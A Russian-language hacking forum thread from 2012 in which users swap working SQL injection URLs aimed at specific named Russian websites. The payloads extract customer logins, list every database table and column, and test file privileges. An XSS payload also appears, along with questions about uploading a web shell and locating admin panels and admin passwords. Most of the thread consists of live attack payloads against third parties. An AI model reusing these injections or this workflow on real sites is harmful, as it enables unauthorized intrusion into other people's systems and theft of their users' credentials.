 |
|
08.03.2012, 23:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
а такой вопрос
чего тут емеил выводится нормально,
Сообщение от None
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+table_schema+from+information_schema.t ables+where+table_name=0x53435f637573746f6d657273% 29,0x00,floor%28rand%280%29*2%29%29having+min%280% 29+or+1--+
а логин и пароль невыводятся вобще
Сообщение от None
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+Login+from+play_today.SC_customers+lim it+0,1%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
как их вывести? |
|
|
09.03.2012, 01:59
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
как тут выывести таблицы ?
http://www.passion.ru/piknik.php/view/%282%29union%28select%281%29,version%28%29,3%29
|
|
|
|
09.03.2012, 04:10
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+15,1
Как залить шелл? |
|
|
|
09.03.2012, 08:28
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
помогите раскрутить,вроде всё правильно делаю
Код:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f
|
|
|
|
09.03.2012, 16:05
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Faaax
помогите раскрутить,вроде всё правильно делаю
Код:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f
Код:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30%22%3E%3Cscript%3Ealert('hack')%3C/script%3E
|
|
|
|
09.03.2012, 16:21
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
а при чём тут xss?
|
|
|
|
09.03.2012, 18:30
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Сообщение от xcedz
ищи админа и пас, админку. через sql не ливанешь, прав нет.
http://www.bing.com/search?q=ip:91.218.229.20
Как узнал какие права? Какие нужны мне для этого? Как найти админку? Как найти таблицу где данные о логине и пассе админа?
|
|
|
|
09.03.2012, 18:31
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Faaax
а при чём тут xss?
А XSS разве не уязвимость? надо уточнять в чем именно помощь то нужна)
|
|
|
|
09.03.2012, 20:06
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от foma9999
Как узнал какие права? Какие нужны мне для этого? Как найти админку? Как найти таблицу где данные о логине и пассе админа?
1)
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+where+user=user()
Ошибка, значит нет прав.
2) Все таблицы:
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.
Вот цель например:
Код:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon
|
|
|
|
09.03.2012, 20:45
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Сообщение от Ereee
1)
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+where+user=user()
Ошибка, значит нет прав.
2) Все таблицы:
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.
Вот цель например:
Код:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon
Ничего не понятно блин!
Как запросы такие составлены?
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как были найдены ссылки
Код:
http://www.robolive.ru/cms/ http://www.robolive.ru/gb/admin/index.php?in_action=logon
?
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
